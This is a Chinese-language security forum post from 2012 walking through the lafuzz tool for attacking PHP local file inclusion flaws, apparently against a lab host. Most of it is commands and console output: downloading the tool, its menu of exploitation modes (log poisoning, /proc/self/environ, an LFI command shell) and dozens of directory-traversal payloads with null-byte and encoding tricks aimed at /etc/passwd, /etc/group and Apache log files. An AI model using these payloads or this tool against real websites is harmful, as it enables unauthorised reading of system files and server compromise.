切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
244 PHP文件包含漏洞 lafuzz[复制链接]
发表于 2012-8-29 02:00:46 | 显示全部楼层 |!read_mode!

这工具带有BYPASS功能
Fuzz with nullbyte and other evasion techniques?(y or n):
选择Y进行BYPASS 选择N不进行
只是没返回结果

安装:
  1. root@Dis9Team:/pen/web# wget http://lafuzz.googlecode.com/files/lafuzz.1.5.py.zip
  2. --2012-08-18 00:34:27--  http://lafuzz.googlecode.com/files/lafuzz.1.5.py.zip
  3. Resolving lafuzz.googlecode.com... 173.194.72.82, 2404:6800:4008:c01::52
  4. Connecting to lafuzz.googlecode.com|173.194.72.82|:80... connected.
  5. HTTP request sent, awaiting response... 200 OK
  6. Length: 7192 (7.0K) [application/zip]
  7. Saving to: `lafuzz.1.5.py.zip.1'

  8. 100%[====================================================================================>] 7,192       --.-K/s   in 0.1s   

  9. 2012-08-18 00:34:28 (63.6 KB/s) - `lafuzz.1.5.py.zip' saved [7192/7192]

  10. root@Dis9Team:/pen/web# unzip lafuzz.1.5.py.zip
复制代码
模糊测试

启动 选择

  1. root@Dis9Team:/pen/web# ./lafuzz.py
复制代码
12个选项:

  1. [1]Fuzz for LFI and Directory Transveral
  2. [2]Traditional Local File Inclusion scan and dump
  3. [3]File Descriptor LFI scan
  4. [4]Exploit LFI via /proc/self/environment
  5. [5]Exploit LFI via File descriptor
  6. [6]Include known apache logs
  7. [7]Exploit LFI via Logfile
  8. [8]Use LFI_Sploit's LFI command shell
  9. [9]Use php:// to read file streams(allow_url_include must be on)
  10. [10]Custom step(../../)
  11. [11]Information
  12. [12]Exit
复制代码
1.模糊测试


  1. Please pick an option(1-12):1
  2. Site and uri to Fuzz: http://5.5.5.3/lif.php?file=
  3. Clearing old files before starting a new scan
  4. Clearing old files before starting a new scan
  5. Clearing old files before starting a new scan
  6. Old files removed, ready to start a new scan
  7. Fuzz with nullbyte and other evasion techniques?(y or n):
  8. ...
  9. Attempting to include: http://5.5.5.3/lif.php?file=..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215etc%u2215group%00.phtml
  10. Attempting to include: http://5.5.5.3/lif.php?file=..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215etc%u2215passwd%00.phtml
  11. Attempting to include: http://5.5.5.3/lif.php?file=..%255c%00.phtml
  12. Attempting to include: http://5.5.5.3/lif.php?file=.%5c../..%5c%00.phtml
  13. Attempting to include: http://5.5.5.3/lif.php?file=/..%c0%9v../%00.phtml
  14. Attempting to include: http://5.5.5.3/lif.php?file=/..%c0%af../%00.phtml
  15. Attempting to include: http://5.5.5.3/lif.php?file=/..%255c..%255c%00.phtml
  16. Attempting to include: http://5.5.5.3/lif.php?file=/..%c0%af..//..%c0%af..//..%c0%af../%00.phtml
  17. Attempting to include: http://5.5.5.3/lif.php?file=/..%255c..%255c/..%255c..%255c/..%255c..%255c%00.phtml
  18. Attempting to include: http://5.5.5.3/lif.php?file=..%255c%00.phtml
  19. Attempting to include: http://5.5.5.3/lif.php?file=.%5c../..%5c/..%c0%9v../%00.phtml
  20. Attempting to include: http://5.5.5.3/lif.php?file=..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216etc%u2216passwd%00.phtml
  21. ....
复制代码
2.本地文件扫描


  1. Please pick an option(1-12):2
  2. Site and uri to attack?: http://5.5.5.3/lif.php?file=
  3. cleaning up old files before starting a scan
  4. Clearing old files before starting a new scan
  5. Ready to start a new scan..
  6. Use a nullbyte(y or n):n
  7. ......
  8. Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../etc/passwd
  9. .......
  10. root@Dis9Team:/pen/web#
复制代码
3.APACHE日志扫描


  1. Please pick an option(1-12):6
  2. Site and uri to attack?: http://5.5.5.3/lif.php?file=
  3. Cleaning up old html files
  4. Clearing old files before starting a new scan
  5. Old files removed, ready to start a new scan
  6. Use a nullbyte(y or n):n
  7. Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../apache/logs/error.log
  8. Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../apache/logs/access.log
  9. Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../apache/logs/error.log
  10. Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../apache/logs/access.log
  11. Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../apache/logs/error.log
  12. Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../apache/logs/access.log
  13. Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../etc/httpd/logs/acces_log
  14. Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../etc/httpd/logs/acces.log
  15. Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../etc/httpd/logs/error_log
  16. Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../etc/httpd/logs/error.log
  17. Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../var/www/logs/access_log
  18. Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../var/www/logs/access.log
  19. Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../usr/local/apache/logs/access_log
  20. Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../usr/local/apache/logs/access.log
  21. Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../var/log/apache/access_log
  22. Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../var/log/apache2/access_log
  23. Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../var/log/apache/access.log
  24. Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../var/log/apache2/access.log
  25. Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../var/log/access_log
  26. Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../var/log/access.log
  27. Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../var/www/logs/error_log
  28. Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../var/www/logs/error.log
  29. Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../usr/local/apache/logs/error_log
  30. Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../usr/local/apache/logs/error.log
  31. Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../var/log/apache/error_log
  32. Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../var/log/apache2/error_log
  33. Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../var/log/apache/error.log
  34. Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../var/log/apache2/error.log
  35. Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../var/log/error_log
  36. Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../var/log/error.log
  37. root@Dis9Team:/pen/web#
复制代码




操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-27 23:59

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部